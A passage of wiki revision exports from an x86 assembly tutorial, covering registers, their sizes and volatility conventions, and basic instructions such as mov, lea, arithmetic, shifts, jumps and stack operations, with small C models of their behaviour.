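    toy_push(&s, 0xD1u);   /* push edi   (placeholder value) */

    (void)toy_pop(&s);     /* pop edi    */
    (void)toy_pop(&s);     /* pop esi    */
    s.sp += 2;             /* add esp, 8 */
    (void)toy_pop(&s);     /* pop ebp    */

    return s.sp - entry_sp;
}
```

If you delete one of the pops or the add in this model, the function returns a non-zero value, which is the situation where ret would pick up the wrong value as its return address.<br />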
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3135Registers2012-01-15T23:18:39Z<p>Killboy: /* esp */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. Most math (addition, subtraction, etc.) is done on values held in registers. Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a convention of the compiler and must be looked after in the code; registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to the object (the ''this'' pointer) is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, keep the counter variable in ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it until it reaches 0. This class of instruction will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because, as a non-volatile register, it is preserved across function calls. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while stack variables are addressed relative to the moving stack pointer (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack, which is the lowest address in use (the stack grows towards lower addresses). Apart from the add and sub instructions that free and allocate stack space, math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning, and the bits store meta-information about the results of previous operations, for example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the cmp and test operations, which commonly set or clear the zero, carry and overflow flags.<br />
These flags are then tested by a conditional jump, which may be controlling program flow or a loop.<br />
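As a rough illustration of what cmp leaves behind, the C sketch below computes two of those flags for an unsigned comparison. ToyFlags and toy_cmp are names invented for this example, and only the zero and carry flags are modelled; the real flags register holds more bits than this.<br />

```c
#include <stdbool.h>
#include <stdint.h>

/* Invented for illustration: just two of the bits in the flags register. */
typedef struct {
    bool zero;   /* ZF: set when the result of the subtraction is 0 */
    bool carry;  /* CF: set when the unsigned subtraction had to borrow */
} ToyFlags;

/* Models "cmp a, b": subtract b from a, keep only the flags, discard the result. */
ToyFlags toy_cmp(uint32_t a, uint32_t b)
{
    ToyFlags f;
    f.zero = (uint32_t)(a - b) == 0;  /* equal operands give a zero result */
    f.carry = a < b;                  /* a borrow happens when a is below b (unsigned) */
    return f;
}
```

A conditional jump then looks at these bits: a jump taken only when the operands were equal is, in this model, one taken when toy_cmp(a, b).zero is true.<br />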
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers is that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is the lower half of one of the 32-bit registers, so that changing the 16-bit register also changes the 32-bit one. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationship between these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
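The same relationships can be checked in C with masks and shifts. This is only a sketch: the helper names low16, high8, low8 and set_low8 are invented here, and a plain 32-bit integer stands in for the register.<br />

```c
#include <stdint.h>

/* Helper names below are illustrative, not part of any real API. */

/* ax: the lower 16 bits of the 32-bit register */
uint16_t low16(uint32_t reg) { return (uint16_t)(reg & 0xFFFFu); }

/* ah: the upper byte of the lower 16 bits */
uint8_t high8(uint32_t reg) { return (uint8_t)((reg >> 8) & 0xFFu); }

/* al: the lowest byte */
uint8_t low8(uint32_t reg) { return (uint8_t)(reg & 0xFFu); }

/* Writing al replaces only the lowest byte; the upper 24 bits stay as they were. */
uint32_t set_low8(uint32_t reg, uint8_t value)
{
    return (reg & 0xFFFFFF00u) | value;
}
```

With reg set to 0x12345678, these helpers give 0x5678, 0x56 and 0x78, matching the first table above.<br />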
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register pair (used for operations such as division and multiplication) is edx:eax. This means that the 32 bits of edx are put in front of the 32 bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
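Here is a small C sketch of the same idea. The function names combine_edx_eax and mul32 are invented for this example; mul32 is meant to mirror how an unsigned 32-bit multiply leaves the high half of its result in edx and the low half in eax.<br />

```c
#include <stdint.h>

/* Combine two 32-bit halves the way edx:eax is read: edx is the high half. */
uint64_t combine_edx_eax(uint32_t edx, uint32_t eax)
{
    return ((uint64_t)edx << 32) | eax;
}

/* Unsigned 32-bit x 32-bit multiply, with the 64-bit product split back
   into a high half (edx) and a low half (eax). Names are illustrative. */
void mul32(uint32_t a, uint32_t b, uint32_t *edx, uint32_t *eax)
{
    uint64_t product = (uint64_t)a * b;  /* widen first so nothing is lost */
    *edx = (uint32_t)(product >> 32);    /* upper 32 bits */
    *eax = (uint32_t)product;            /* lower 32 bits */
}
```

Calling combine_edx_eax(0x11223344, 0xaabbccdd) reproduces the value in the table above.<br />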
<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Simple_Instructions&diff=3134Simple Instructions2012-01-15T22:53:01Z<p>Killboy: /* shl, shr, sal, sar */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over some basic assembly instructions that you will likely see frequently. Some of the instructions shown here are tricky, and some have special properties (such as the registers they use). Additionally, x86 assembly consists of hundreds of different instructions. As a result, you will likely want to find a complete reference book or website to have alongside you. This page, however, will give enough of an introduction to get you started. <br />
<br />
== Pointers and Dereferencing==<br />
First, we will start with the hard stuff. If you understood the pointers section, this shouldn't be too bad. If you didn't, you should probably go back and refresh your memory. <br />
<br />
Recall that a pointer is a data type that stores an address as its value. Since registers are simply 32-bit values with no actual types, any register may or may not be a pointer, depending on what is stored. It is the responsibility of the program to treat pointers as pointers and to treat non-pointers as non-pointers. <br />
<br />
If a value is a pointer, it can be dereferenced. Recall that dereferencing a pointer retrieves the value stored at the address being pointed to. In assembly, this is generally done by putting square brackets ("[" and "]") around the register. For example:<br />
* eax -- is the value stored in eax<br />
* [eax] -- is the value pointed to by eax<br />
This will be thoroughly discussed in upcoming sections.<br />
<br />
== Doing Nothing ==<br />
The ''nop'' instruction is probably the simplest instruction in assembly. nop is short for "no operation" and it does nothing. This instruction is used for padding. <br />
<br />
== Moving Data Around ==<br />
The instructions in this section deal with relocating numbers and pointers. <br />
<br />
=== mov, movsx, movzx ===<br />
''mov'' is the instruction used for assignment, analogous to the "=" sign in most languages. mov can move data between a register and memory, between two registers, or from a constant to a register or memory. Here are some examples:<br />
mov eax, 1 ; set eax to 1 (eax = 1)<br />
mov edx, ecx ; set edx to whatever ecx is (edx = ecx)<br />
mov eax, 18h ; set eax to 0x18<br />
mov eax, [ebx] ; set eax to the value in memory that ebx is pointing at<br />
 mov dword ptr [ebx], 3 ; move the 32-bit number 3 into the memory address that ebx is pointing at<br />
<br />
''movsx'' and ''movzx'' are special versions of mov which copy a signed (movsx) or unsigned (movzx) value from a smaller register or memory location into a bigger register. <br />
<br />
''movsx'' means ''move with sign extension''. The data is moved from a smaller register into a bigger register, and the sign is preserved by either padding with 0's (for positive values) or F's (for negative values). Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000''', since it was positive<br />
* '''0x7FFF''' becomes '''0x00007FFF''', since it was positive<br />
* '''0xFFFF''' becomes '''0xFFFFFFFF''', since it was negative (note that 0xFFFF is -1 in 16-bit signed, and 0xFFFFFFFF is -1 in 32-bit signed)<br />
* '''0x8000''' becomes '''0xFFFF8000''', since it was negative (note that 0x8000 is -32768 in 16-bit signed, and 0xFFFF8000 is -32768 in 32-bit signed)<br />
<br />
''movzx'' means ''move with zero extension''. The data is moved from a smaller register into a bigger register, and the sign is ignored. Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000'''<br />
* '''0x7FFF''' becomes '''0x00007FFF'''<br />
* '''0xFFFF''' becomes '''0x0000FFFF'''<br />
* '''0x8000''' becomes '''0x00008000'''<br />
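<br />
The two kinds of extension can be sketched in C as follows. This is only a model of the 16-bit to 32-bit case; the function names movsx16 and movzx16 are invented for the example. <br />

```c
#include <stdint.h>

/* Hypothetical model of movsx from a 16-bit source to a 32-bit destination. */
uint32_t movsx16(uint16_t value)
{
    /* If the sign bit (bit 15) is set, fill the upper 16 bits with 1s (F's). */
    if (value & 0x8000u)
        return 0xFFFF0000u | value;
    /* Otherwise the upper 16 bits are filled with 0s. */
    return value;
}

/* Hypothetical model of movzx: the upper 16 bits are always 0. */
uint32_t movzx16(uint16_t value)
{
    return value;
}
```

The only inputs on which the two functions disagree are those with the top bit set, which matches the lists above. <br />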
<br />
=== lea ===<br />
''lea'' is very similar to mov, except that math can be done on the original value before it is used. The "[" and "]" characters always surround the second parameter, but in this case they ''do not indicate dereferencing''. It is easiest to think of them as just being part of the formula. <br />
<br />
lea is generally used for calculating array offsets, since the address of an element of the array can be found with [arraystart + offset*datasize]. lea can also be used for quickly doing math, often with an addition and a multiplication. Examples of both uses are below. <br />
<br />
Here are some examples of using lea:<br />
lea eax, [eax+eax] ; Double the value of eax -- eax = eax * 2<br />
lea edi, [esi+0Bh] ; Add 11 to esi and store the result in edi<br />
lea eax, [esi+ecx*4] ; This is generally used for indexing an array of integers. esi is a <br />
pointer to the beginning of an array, and ecx is the index of the <br />
element that is to be retrieved. The index is multiplied by 4 <br />
because Integers are 4 bytes long. eax will end up storing the <br />
address of the ecx'th element of the array. <br />
<br />
 lea edi, [eax+eax*2] ; Triple the value of eax and store the result in edi -- edi = eax * 3<br />
lea edi, [eax+ebx*2] ; This likely indicates that eax stores an array of 16-bit (2 byte) <br />
values, and that ebx is an offset into it. Note the similarities <br />
between this and the previous example: the same math is being done, <br />
but for a different reason. <br />
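<br />
Here is a small C sketch of the arithmetic that lea performs. The function lea below is a made-up model, not a real library call: it only computes base + index*scale and never touches memory. The second function checks that the address of an array element follows the same formula. <br />

```c
#include <stdint.h>

/* Hypothetical model of "lea dest, [base + index*scale]": arithmetic only, no memory access. */
uint32_t lea(uint32_t base, uint32_t index, uint32_t scale)
{
    return base + index * scale;
}

/* Returns 1 if the address of element 3 equals arraystart + 3*datasize. */
int element_address_matches(void)
{
    int32_t values[8];
    return (char *)&values[3] == (char *)values + 3 * sizeof values[0];
}
```

With eax = 5, the model of lea edi, [eax+eax*2] is lea(5, 5, 2), which gives 15. <br />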
<br />
== Math and Logic ==<br />
The instructions in this section deal with math and logic. Some are simple, and others (such as multiplication and division) are pretty tricky. <br />
<br />
=== add, sub ===<br />
A register can have either another register, a constant value, or a pointer added to or subtracted from it. The syntax of addition and subtraction is fairly simple:<br />
add eax, 3 ; Adds 3 to eax -- eax = eax + 3<br />
add ebx, eax ; Adds the value of eax to ebx -- ebx = ebx + eax<br />
sub ecx, 3 ; Subtracts 3 from ecx -- ecx = ecx - 3<br />
<br />
=== inc, dec ===<br />
These instructions simply increment and decrement a register. <br />
inc eax ; eax++<br />
dec ecx ; ecx--<br />
<br />
=== and, or, xor, not, neg ===<br />
All logical instructions are bitwise. If you don't know what "bitwise arithmetic" means, you should probably look it up. The simplest way of thinking of this is that each bit in the two operands has the operation done between them, and the result is stored in the first one. <br />
<br />
The instructions are pretty self-explanatory: and does a bitwise 'and', or does a bitwise 'or', xor does a bitwise 'xor', and not does a bitwise negation (it inverts every bit). neg is different: it is arithmetic rather than bitwise, and computes the two's-complement negative of its operand.<br />
<br />
Here are some examples:<br />
 and eax, 7 ; eax = eax & 7 -- because 7 is 000..000111, this clears all bits <br />
 except for the last three. <br />
 or eax, 16 ; eax = eax | 16 -- because 16 is 000..00010000, this sets the 5th <br />
 bit from the right to "1". <br />
 xor eax, 1 ; eax = eax ^ 1 -- this toggles the right-most bit in eax, 0=>1 or <br />
 1=>0.<br />
 xor eax, FFFFFFFFh ; eax = eax ^ 0xFFFFFFFF -- this toggles every bit in eax, which is <br />
 identical to a bitwise negation.<br />
 not eax ; eax = ~eax -- inverts every bit in eax, same as the previous.<br />
 neg eax ; eax = -eax -- two's-complement negation, the same as inverting every bit and adding 1.<br />
xor eax, eax ; eax = 0 -- this clears eax quickly, and is extremely <br />
common.<br />
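<br />
For comparison, here is a C sketch of these operations on 32-bit values. The function names are invented for the example. Note that bitwise inversion (~x) and two's-complement negation (-x) are different operations: -x is equal to ~x + 1. <br />

```c
#include <stdint.h>

/* Each function mirrors one instruction applied to a 32-bit register. */
uint32_t keep_low_three_bits(uint32_t x) { return x & 7u; }   /* and x, 7  */
uint32_t set_fifth_bit(uint32_t x)       { return x | 16u; }  /* or x, 16  */
uint32_t toggle_lowest_bit(uint32_t x)   { return x ^ 1u; }   /* xor x, 1  */
uint32_t invert_all_bits(uint32_t x)     { return ~x; }       /* same as x ^ 0xFFFFFFFF */
uint32_t negate(uint32_t x)              { return 0u - x; }   /* two's-complement negation */
uint32_t clear(uint32_t x)               { return x ^ x; }    /* xor x, x is always 0 */
```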
<br />
=== mul, imul, div, idiv, cdq ===<br />
Multiplication and division are the trickiest operations commonly used, because of how they deal with overflow issues. Both multiplication and division make use of the 64-bit register edx:eax. <br />
<br />
''mul'' multiplies the unsigned value in eax with the operand, and stores the result in the 64-bit register edx:eax. ''imul'' does the same thing, except the value is signed. Here are some examples:<br />
 mul ecx ; edx:eax = eax * ecx (unsigned)<br />
 imul edx ; edx:eax = eax * edx (signed)<br />
<br />
''imul'' (but not ''mul'') can also be used with two parameters, in which case it multiplies the first by the second as expected and keeps only the low 32 bits of the result:<br />
 imul ecx, 10h ; ecx = ecx * 0x10<br />
 imul ecx, ebx ; ecx = ecx * ebx<br />
<br />
''div'' divides the 64-bit value in edx:eax by the operand, and stores the quotient in eax. The remainder (modulus) is stored in edx. In other words, div does both division and modular division, at the same time. Typically, a program will only use one or the other, so you will have to check which instructions follow to see whether eax or edx is saved. Here are some examples:<br />
div ecx ; eax = edx:eax / ecx (unsigned)<br />
; edx = edx:eax % ecx (unsigned)<br />
<br />
idiv ecx ; eax = edx:eax / ecx (signed)<br />
; edx = edx:eax % ecx (signed)<br />
<br />
''cdq'' is generally used immediately before idiv. It stands for "convert doubleword to quadword." In other words, it converts the 32-bit value in eax to the 64-bit value in edx:eax, overwriting anything in edx with either 0's (if eax is positive) or F's (if eax is negative). This is very similar to movsx, above. <br />
<br />
''xor edx, edx'' is generally used immediately before div. It clears edx to ensure that no leftover data is divided. <br />
<br />
Here is a common use of cdq and idiv:<br />
mov eax, 1007 ; 1007 will be divided<br />
mov ecx, 10 ; .. by 10<br />
cdq ; extends eax into edx<br />
idiv ecx ; eax will be 1007/10 = 100, and edx will be 1007%10 = 7<br />
<br />
Here is a common use of xor and div (the results are the same as the previous example):<br />
mov eax, 1007<br />
mov ecx, 10<br />
xor edx, edx<br />
div ecx<br />
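<br />
The behaviour of cdq and div can be modelled in C roughly as below. This is a sketch under assumptions: the names regs_t, cdq and div32 are made up, the divisor must not be zero, and the quotient is simply truncated to 32 bits, whereas a real processor raises an exception when the quotient does not fit in eax. <br />

```c
#include <stdint.h>

/* Hypothetical container for the two result registers. */
typedef struct {
    uint32_t eax;   /* quotient  */
    uint32_t edx;   /* remainder */
} regs_t;

/* Model of cdq: returns the value edx receives when eax is sign-extended. */
uint32_t cdq(uint32_t eax)
{
    return (eax & 0x80000000u) ? 0xFFFFFFFFu : 0u;
}

/* Model of unsigned div: divides the 64-bit value edx:eax by the divisor. */
regs_t div32(uint32_t edx, uint32_t eax, uint32_t divisor)
{
    uint64_t dividend = ((uint64_t)edx << 32) | eax;
    regs_t result;
    result.eax = (uint32_t)(dividend / divisor);  /* truncated in this sketch */
    result.edx = (uint32_t)(dividend % divisor);
    return result;
}
```

With edx cleared, div32(0, 1007, 10) yields a quotient of 100 and a remainder of 7. If edx is left holding stale data, for example div32(1, 0, 16), the dividend is really 0x100000000, which is why edx is cleared or sign-extended first. <br />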
<br />
== shl, shr, sal, sar ==<br />
shl - shift left, shr - shift right.<br />
<br />
sal - shift arithmetic left, sar - shift arithmetic right.<br />
<br />
These are used to do a binary shift, equivalent to the C operations << and >>.<br />
They each take two operands: the register to use, and the number of places to shift the value in the register. shl and sal do exactly the same thing. shr fills the vacated high bits with 0's, which suits unsigned values, while sar fills them with copies of the sign bit, which suits signed values. As computers operate in base 2, these instructions can be used as a faster replacement for multiplication/division operations involving powers of 2.<br />
<br />
Divide by 2 (unsigned):<br />
mov eax, 16 ; eax = 16<br />
shr eax, 1 ; eax = 8<br />
<br />
Multiply by 4 (signed):<br />
mov eax, 5 ; eax = 5<br />
sal eax, 2 ; eax = 20<br />
<br />
Visualising the bits moving:<br />
mov eax, 7 ; = 0000 0111 (7)<br />
shl eax, 1 ; = 0000 1110 (14)<br />
shl eax, 2 ; = 0011 1000 (56)<br />
shr eax, 1 ; = 0001 1100 (28)<br />
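<br />
The difference between shr and sar only shows up when the top bit is set. The C sketch below models both on 32-bit values; the function names are invented, and the shift count is assumed to be between 0 and 31. sar is written out by hand here because right-shifting a negative signed value in C is implementation-defined. <br />

```c
#include <stdint.h>

/* Model of shr: vacated high bits are filled with 0s. */
uint32_t shr(uint32_t value, unsigned count)
{
    return value >> count;
}

/* Model of sar: vacated high bits are filled with copies of the sign bit. */
uint32_t sar(uint32_t value, unsigned count)
{
    uint32_t shifted = value >> count;
    if (value & 0x80000000u)
        shifted |= ~(0xFFFFFFFFu >> count);  /* set the top 'count' bits */
    return shifted;
}
```

For example, 0xFFFFFFF0 is -16 as a signed value. sar by 1 gives 0xFFFFFFF8 (-8), while shr by 1 gives 0x7FFFFFF8, a large positive number. <br />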
<br />
== Jumping Around ==<br />
Instructions in this section are used to compare values and to make jumps. These jumps are used for calls, if statements, and every type of loop. The operand for most jump instructions is the address to jump to. <br />
<br />
=== jmp ===<br />
''jmp'', or jump, sends the program execution to the specified address no matter what. Here is an example:<br />
jmp 1400h ; jump to the address 0x1400<br />
<br />
=== call, ret ===<br />
''call'' is similar to jump, except that in addition to sending the program to the specified address, it also saves ("pushes") the address of the instruction following the call (the return address) onto the stack. This will be explained more in a later section. <br />
<br />
''ret'' removes ("pops") the top value off of the stack, and jumps to it. In almost all cases, this value was placed onto the stack by the call instruction. If the stack pointer is at the wrong location, or the saved address was overwritten, ret attempts to jump to an invalid address which usually crashes the program. In some cases, it may jump to the wrong place where the program will almost inevitably crash. <br />
<br />
''ret'' can also have a parameter. This parameter is added to the stack pointer immediately after ret pops the return address. This addition allows the function to remove values that were pushed onto the stack before the call. This will be discussed in a later section. <br />
<br />
The combination of ''call'' and ''ret'' is used to implement functions. Here is an example of a simple function:<br />
<br />
<pre> call 4000h<br />
...... ; any amount of code<br />
4000h:<br />
mov eax, 1<br />
ret ; Because eax represents the return value, this function would return 1, and <br />
nothing else would happen<br />
</pre><br />
<br />
=== cmp, test ===<br />
''cmp'', or compare, compares the two operands and sets a number of flags in a special-purpose register based on the result. Specialized jump commands can check these flags to jump on certain conditions. One way of remembering how ''cmp'' works is to think of it as subtracting the second parameter from the first, comparing the result to 0, and throwing away the result. <br />
<br />
''test'' is very similar to ''cmp'', except that it performs a bitwise 'and' operation between the two variables (and throws away the result), and compares it to zero. ''test'' is most commonly used to compare a variable to itself to check if it's zero. <br />
<br />
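Here are the most common flags (the "greater than" and "less than" entries are a simplification; the processor actually derives those conditions from its sign, overflow, and carry flags):<br />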
* Zero -- set if and only if the two elements are equal (ie, if the resultant operation was equal to zero)<br />
* Greater than -- set if the first element is greater than the second (ie, if the resultant operation was greater than zero)<br />
* Less than -- set if the first element is less than the second (ie, if the resultant operation was less than zero)<br />
<br />
Flags are set by most arithmetic instructions. The instructions most commonly used to set them for comparisons are cmp, test, inc, and dec.<br />
<br />
=== jz/je, jnz/jne, jl/jb, jg, jle, jge ===<br />
* ''jz'' and ''je'' (which are synonyms) will jump to the address specified if and only if the 'zero' flag is set, which indicates that the two values were equal. In other words, "jump if equal". <br />
* ''jnz'' and ''jne'' (which are also synonyms) will jump to the address specified if and only if the 'zero' flag is not set, which indicates that the two values were not equal. In other words, "jump if different". <br />
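* ''jl'' and ''jb'' both jump if the first parameter is less than the second, but they are not synonyms: ''jl'' ("jump if less") treats the values as signed, while ''jb'' ("jump if below") treats them as unsigned. <br />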
* ''jg'' jumps if the first parameter is greater than the second. <br />
* ''jle'' jumps if the 'less than' or the 'zero' flag is set, so "less than or equal to". <br />
* ''jge'' jumps if the first is "greater than or equal to" the second.<br />
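<br />
Whether a comparison is signed or unsigned matters as soon as the top bit of a value is set. The following C sketch (with made-up function names) models the decisions taken by jl and jb after "cmp first, second". The signed comparison is done by flipping the sign bit of both values, which is a portable way of ordering 32-bit two's-complement numbers. <br />

```c
#include <stdint.h>

/* Model of jl: signed "less than". Flipping the sign bit maps signed order onto unsigned order. */
int jl_taken(uint32_t first, uint32_t second)
{
    return (first ^ 0x80000000u) < (second ^ 0x80000000u);
}

/* Model of jb: unsigned "below". */
int jb_taken(uint32_t first, uint32_t second)
{
    return first < second;
}
```

For 0xFFFFFFFF compared against 1, jl_taken returns 1 (because -1 is less than 1) but jb_taken returns 0 (because 4294967295 is not below 1). <br />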
<br />
These jumps are all used to implement various loops and conditions. For example, here is some C code:<br />
if(a == 3)<br />
b;<br />
else<br />
c;<br />
And here is how it might look in assembly (not exactly assembly, but this is an example):<br />
10 cmp a, 3<br />
20 jne 50<br />
30 b<br />
40 jmp 60<br />
50 c<br />
60<br />
<br />
Here is an example of a loop in C:<br />
for(i = 0; i < 5; i++)<br />
{<br />
a;<br />
b;<br />
}<br />
And here is the equivalent loop in assembly:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
<br />
== Manipulating the Stack ==<br />
Instructions in this section are used for adding and removing data from the stack. The stack will be examined in detail in a later section; this section will simply show some commonly used instructions. <br />
<br />
=== push, pop ===<br />
''push'' decrements the stack pointer by the size of the operand, then saves the operand to the new address. This line:<br />
push ecx<br />
Is functionally equivalent to:<br />
